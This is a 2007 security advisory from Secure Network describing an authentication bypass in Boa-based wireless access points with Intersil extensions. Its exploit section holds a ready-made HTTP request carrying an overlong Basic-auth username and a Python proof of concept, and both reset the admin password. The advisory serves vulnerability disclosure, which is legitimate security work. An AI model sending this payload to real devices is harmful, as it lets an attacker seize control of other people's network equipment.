Boa (with Intersil Extensions) - HTTP Basic Authentication Bypass
Secure Network - Security Research Advisory
Vuln name: HTTP Basic Authentication Bypass
Systems affected: Boa/0.93.15 (with Intersil Extensions) based systems (i.e.
FreeLan 802.11g Wireless Access Point (RO80211G-AP))
Severity: High
Local/Remote: Remote
Vendor URL: http://www.boa.org - http://isl3893.sourceforge.net -
http://www.roper-europe.com
Author(s): Luca "ikki" Carettoni - luca.carettoni@xxxxxxxxxxxxxxxx, Claudio
"paper" Merloni - claudio.merloni@xxxxxxxxxxxxxxxx
Vendor disclosure: 24th August 2007
Vendor acknowledged: -
Vendor patch release: -
Public disclosure: 10th September 2007
Advisory number: SN-2007-02
Advisory URL: http://www.securenetwork.it/advisories/
*** SUMMARY ***
Boa is a single-tasking HTTP server. That means that, unlike traditional web
servers, it does not fork for each incoming connection, nor does it fork many
copies of itself to handle multiple connections.
Boa is very low on hardware usage and is therefore used on many embedded
systems, including routers, wireless access points and portable devices.
The Intersil isl3893 is an arm9 System On Chip for wireless access points. The
goal of the project is to make an embedded distribution built around uclibc and
uclinux.
It is possible to overwrite the "admin" password in memory, thus allowing an
attacker to gain access to the web interface and alter configuration
parameters. This vulnerability can be combined with another known vulnerability
(CVE-2000-0920) to read arbitrary files from the device filesystem.
It's important to notice that Boa httpd doesn't have any authentication code
built in; the flaw is inside the Intersil extensions but we can't confirm it
because no source code is released.
*** VULNERABILITY DETAILS ***
When asked for HTTP basic authentication credentials, it is possible to fill up
the stack memory of the boa process passing a string longer than 127 characters
as username. In that situation the string passed as password will overwrite the
current in memory value of the admin password, thus enabling the attacker to
reset it to a known value. Once reset the password, the attacker has of course
access to the configuration panel.
As an example, the password can be set to "owned" sending the following request
to the web server:
GET / HTTP/1.1
Host: 192.168.0.1
Authorization: Basic
YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYTpvd25lZA==
The basic authorization header parameter contains the base64/mime encoded
string
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:owned"
*** EXPLOIT ***
The vulnerability can exploited through simple HTTP request, i.e. using a
common web browser (using the authentication credential specified above).
The following snippet of python code can be used to reproduce the issue:
###### CUT HERE ######
#!/usr/bin/env python
import urllib2
SERVER_IP_ADDRESS = '192.168.0.1'
USERNAME =
'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
NEW_PASSWORD = 'owned'
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password('LOGIN(default username & password is admin)',
SERVER_IP_ADDRESS, USERNAME, NEW_PASSWORD);
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
res = urllib2.urlopen('http://'+SERVER_IP_ADDRESS+'/home/index.shtml')
###### CUT HERE ######
*** FIX INFORMATION ***
N/A
*** WORKAROUNDS ***
N/A
*********************
*** LEGAL NOTICES ***
*********************
Secure Network (www.securenetwork.it) is an information security company,
which provides consulting and training services, and engages in security
research and development.
We are committed to open, full disclosure of vulnerabilities, cooperating
with software developers for properly handling disclosure issues.
This advisory is copyright © 2007 Secure Network S.r.l. Permission is
hereby granted for the redistribution of this alert, provided that it is
not altered except by reformatting it, and that due credit is given. It
may not be edited in any way without the express consent of Secure Network
S.r.l. Permission is explicitly given for insertion in vulnerability
databases and similars, provided that due credit is given to Secure Network
The information in the advisory is believed to be accurate at the time of
publishing based on currently available information. This information is
provided as-is, as a free service to the community by Secure Network
research staff. There are no warranties with regard to this information.
Secure Network does not accept any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
If you have any comments or inquiries, or any issue with what is reported
in this advisory, please inform us as soon as possible.
E-mail: securenetwork@xxxxxxxxxxxxxxxx
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
Phone: +39 0363 560 404